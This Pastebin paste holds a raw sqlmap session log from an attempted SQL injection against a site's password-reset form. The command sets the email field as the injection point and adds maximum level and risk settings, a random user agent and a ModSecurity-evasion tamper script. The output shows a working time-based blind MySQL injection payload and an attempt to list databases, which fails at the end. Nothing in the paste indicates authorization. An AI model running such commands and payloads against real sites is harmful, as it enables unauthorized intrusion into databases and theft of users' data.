Advertisement
Guest User

Untitled

a guest
Dec 13th, 2018
1,297
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.03 KB | None | 0 0
  1. > sqlmap -u https://site.com/forget_password --data="authenticity_token=CapTbk8wgJtYrsVrLH81X6oGOt43E0oC5El4Ltvu3E3TmQNOwje6ZgmWxDj61XdeyEiCerRlXgJnok2dSCeWSg%3D%3D&commit=Reset%20my%20password&email=*&utf8=%E2%9C%93" --level=5 --risk=3 --random-agent --batch --dbs --tamper=modsecurityversioned --fresh-queries
  2. ___
  3. __H__
  4. ___ ___[)]_____ ___ ___ {1.2.12.14#dev}
  5. |_ -| . [(] | .'| . |
  6. |___|_ [,]_|_|_|__,| _|
  7. |_|V |_| http://sqlmap.org
  8.  
  9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  10.  
  11. [*] starting @ 12:22:47 /2018-12-13/
  12.  
  13. [12:22:47] [INFO] loading tamper module 'modsecurityversioned'
  14. [12:22:47] [WARNING] tamper script 'modsecurityversioned' is only meant to be run against MySQL
  15. [12:22:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9' from file 'C:\PentestBox\bin\WebApplications\sqlmap\txt\user-agents.txt'
  16. custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
  17. [12:22:48] [INFO] resuming back-end DBMS 'mysql'
  18. [12:22:48] [INFO] testing connection to the target URL
  19. [12:22:50] [INFO] heuristics detected web page charset 'ISO-8859-2'
  20. sqlmap resumed the following injection point(s) from stored session:
  21. ---
  22. Parameter: #1* ((custom) POST)
  23. Type: AND/OR time-based blind
  24. Title: MySQL >= 5.0.12 AND time-based blind
  25. Payload: authenticity_token=CapTbk8wgJtYrsVrLH81X6oGOt43E0oC5El4Ltvu3E3TmQNOwje6ZgmWxDj61XdeyEiCerRlXgJnok2dSCeWSg==&commit=Reset my password&email='||(SELECT 0x55774146 WHERE 7124=7124 AND SLEEP(5))||'&utf8=%E2%9C%93
  26. ---
  27. [12:22:50] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
  28. [12:22:50] [INFO] the back-end DBMS is MySQL
  29. web application technology: PHP 5.3.3, Nginx 1.10.2
  30. back-end DBMS: MySQL >= 5.0.12
  31. [12:22:50] [INFO] fetching database names
  32. [12:22:50] [INFO] fetching number of databases
  33. [12:22:50] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
  34. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
  35. [12:23:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
  36. 4
  37. [12:23:03] [INFO] retrieved:
  38. [12:23:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
  39. [12:23:04] [INFO] retrieved:
  40. [12:23:05] [INFO] retrieved:
  41. [12:23:06] [INFO] retrieved:
  42. [12:23:07] [INFO] falling back to current database
  43. [12:23:07] [INFO] fetching current database
  44. [12:23:07] [INFO] retrieved:
  45. [12:23:08] [CRITICAL] unable to retrieve the database names
  46.  
  47. [*] ending @ 12:23:08 /2018-12-13/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement